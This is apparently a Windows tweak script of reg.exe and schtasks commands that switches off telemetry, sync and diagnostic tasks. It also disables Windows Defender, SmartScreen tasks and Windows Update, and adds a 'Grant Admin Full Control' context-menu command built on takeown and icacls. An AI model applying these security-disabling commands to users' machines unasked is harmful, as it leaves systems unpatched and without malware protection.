Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{C1D23ACC-752B-43E5-8448-8D0E519CD6D6}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2297E4E2-5DBE-466D-A12B-0F8286F0D9CA}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E5323777-F976-4f5b-9B55-B94699C46E44}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2EEF81BE-33FA-4800-9670-1CD474972C3F}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{52079E78-A92B-413F-B213-E8FE35712E72}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{7D7E8402-7C54-4821-A34E-AEEFD62DED93}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{D89823BA-7180-4B81-B50C-7E471E6121A3}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{8BC668CF-7728-45BD-93F8-CF2B3B41D7AB}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{9231CB4C-BF57-4AF3-8C55-FDA7BFCC04C5}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E390DF20-07DF-446D-B962-F5C953062741}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{992AFA70-6F47-4148-B3E9-3003349C1548}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\DiagTrack" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\dmwappushservice" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WMDRM" /v "DisableOnline" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{A8804298-2D5F-42E3-9531-9C8C39EB29CE}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\LooselyCoupled" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CredUI" /v "DisablePasswordReveal" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "DoNotTrack" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "OptimizeWindowsSearchResultsForScreenReaders" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead" /v "FPEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes" /v "ShowSearchSuggestionsGlobal" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Browser" /v "AllowAddressBarDropdown" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy" /v "EnableEncryptedMediaExtensions" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Language" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "SystemSettingsDownloadMode" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Speech" /v "AllowSpeechModelUpdate" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgrade" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgradePeriod" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpdatePeriod" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsStore\WindowsUpdate" /v "AutoDownload" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\7971f918-a847-4430-9279-4a52d1efe18d" /v "RegisteredWithAU" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\OneDrive" /v "PreventNetworkTrafficPreUserSignIn" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SettingSync\BackgroundUploadTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /Disable schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ApplicationData\CleanupTemporaryState" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ApplicationData\DsSvcCleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\HypervisorFlightingTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Diagnosis\Scheduled" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Management\Provisioning\Logon" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Multimedia\SystemSoundsService" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\NlaSvc\WiFiTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Offline Files\Background Synchronization" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Offline Files\Logon Synchronization" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Ras\MobilityManager" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Servicing\StartComponentCleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SettingSync\BackupTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SettingSync\NetworkStateChangeTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceAgentTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceManagerTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\User Profile Service\HiveUploadTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\WCM\WiFiTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Media Sharing\UpdateLibrary" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Wininet\CacheTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Maintenance Work" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Workplace Join\Automatic-Device-Join" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Driver Easy Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Office\Office ClickToRun Service Monitor" /Disable
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
